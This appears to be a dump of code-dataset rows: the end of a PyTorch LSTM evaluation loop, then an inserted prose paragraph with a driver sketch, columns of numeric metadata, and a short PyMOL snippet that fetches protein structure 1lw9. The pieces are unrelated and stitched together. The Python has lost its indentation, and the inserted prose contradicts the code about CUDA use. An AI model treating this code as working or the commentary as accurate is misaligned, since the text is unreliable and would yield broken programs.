use_gpu = torch.cuda.is_available()
loss_MSE = torch.nn.MSELoss()
loss_L1 = torch.nn.L1Loss()
tested_batch = 0
losses_mse = []
losses_l1 = []
for data in test_dataloader:
inputs, labels = data
if inputs.shape[0] != batch_size:
continue
if use_gpu:
inputs, labels = Variable(inputs.cuda()), Variable(labels.cuda())
else:
inputs, labels = Variable(inputs), Variable(labels)
Hidden_State, Cell_State = gclstm.loop(inputs)
loss_MSE = torch.nn.MSELoss()
loss_L1 = torch.nn.L1Loss()
loss_mse = loss_MSE(Hidden_State, labels)
loss_l1 = loss_L1(Hidden_State, labels)
losses_mse.append(loss_mse.data)
losses_l1.append(loss_l1.data)
tested_batch += 1
if tested_batch % 1000 == 0:
cur_time = time.time()
print('Tested #: {}, loss_l1: {}, loss_mse: {}, time: {}'.format( \
tested_batch * batch_size, \
np.around([loss_l1.data[0]], decimals=8), \
np.around([loss_mse.data[0]], decimals=8), \
np.around([cur_time - pre_time], decimals=8) ) )
pre_time = cur_time
losses_l1 = np.array(losses_l1)
losses_mse = np.array(losses_mse)
mean_l1 = np.mean(losses_l1) * max_speed
std_l1 = np.std(losses_l1) * max_speed
print('Tested: L1_mean: {}, L1_std : {}'.format(mean_l1, std_l1))
return [losses_l1, losses_mse, mean_l1, std_l1]
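All of the train and test helpers above share one contract: DataLoaders that yield (batch, step, feature) float tensors, a fixed batch size matching the first batch seen (undersized batches are skipped), and a model moved to CUDA unconditionally. A minimal driver sketch with toy random data, assuming Models defines LSTM and a GPU is available:
import torch
from torch.utils.data import DataLoader, TensorDataset

# Toy data: 256 sequences, 10 time steps, 32 detector features.
sequences = torch.randn(256, 10, 32)
targets = torch.randn(256, 32)
dataset = TensorDataset(sequences, targets)

# drop_last avoids tripping the shape-mismatch `continue` inside the loops.
train_loader = DataLoader(dataset, batch_size=16, shuffle=True, drop_last=True)
valid_loader = DataLoader(dataset, batch_size=16, drop_last=True)

lstm, loss_history = TrainLSTM(train_loader, valid_loader, num_epochs=1)
TestLSTM(lstm, valid_loader, max_speed=70.0)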
| 36.163859
| 178
| 0.53339
| 2,542
| 23,615
| 4.675452
| 0.072777
| 0.028271
| 0.021203
| 0.024232
| 0.880522
| 0.865966
| 0.852419
| 0.845099
| 0.836096
| 0.831637
| 0
| 0.0164
| 0.369977
| 23,615
| 652
| 179
| 36.219325
| 0.78243
| 0.02617
| 0
| 0.847727
| 0
| 0
| 0.022604
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015909
| false
| 0
| 0.011364
| 0
| 0.043182
| 0.040909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| b8fac7d25cbc629323ca9ceeb456b2e1d16073b2
| 294
| py
| Python
| jupyterlab2pymolpysnips/WaterPentagon/waterTriple.py
| MooersLab/pymolpysnips
| 50a89c85adf8006d85c1d6cd3f8aad7e440a0b92
| ["MIT"] | null | null | null
| jupyterlab2pymolpysnips/WaterPentagon/waterTriple.py
| MooersLab/pymolpysnips
| 50a89c85adf8006d85c1d6cd3f8aad7e440a0b92
| ["MIT"] | null | null | null
| jupyterlab2pymolpysnips/WaterPentagon/waterTriple.py
| MooersLab/pymolpysnips
| 50a89c85adf8006d85c1d6cd3f8aad7e440a0b92
| ["MIT"] | null | null | null |
"""
cmd.do('fetch 1lw9, async=0; ')
cmd.do('zoom resi 313; ')
cmd.do('preset.technical(selection="all", mode=1);')
"""
cmd.do('fetch 1lw9, async=0; ')
cmd.do('zoom resi 313; ')
cmd.do('preset.technical(selection="all", mode=1);')
# Description: triple water pentagon.
# Source: placeHolder
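The same three commands are easier to reuse wrapped in a function. A sketch that keeps everything going through cmd.do, as the snippet does; the PDB code and residue number are just the defaults from above:
from pymol import cmd

def water_triple(code="1lw9", resi="313"):
    """Fetch a structure, zoom to one residue, and apply the technical preset."""
    cmd.do('fetch {}, async=0; '.format(code))
    cmd.do('zoom resi {}; '.format(resi))
    cmd.do('preset.technical(selection="all", mode=1);')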
| 22.615385
| 52
| 0.656463
| 44
| 294
| 4.386364
| 0.477273
| 0.15544
| 0.103627
| 0.145078
| 0.756477
| 0.756477
| 0.756477
| 0.756477
| 0.756477
| 0.756477
| 0
| 0.053846
| 0.115646
| 294
| 12
| 53
| 24.5
| 0.688462
| 0.193878
| 0
| 0
| 0
| 0
| 0.634783
| 0.234783
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
|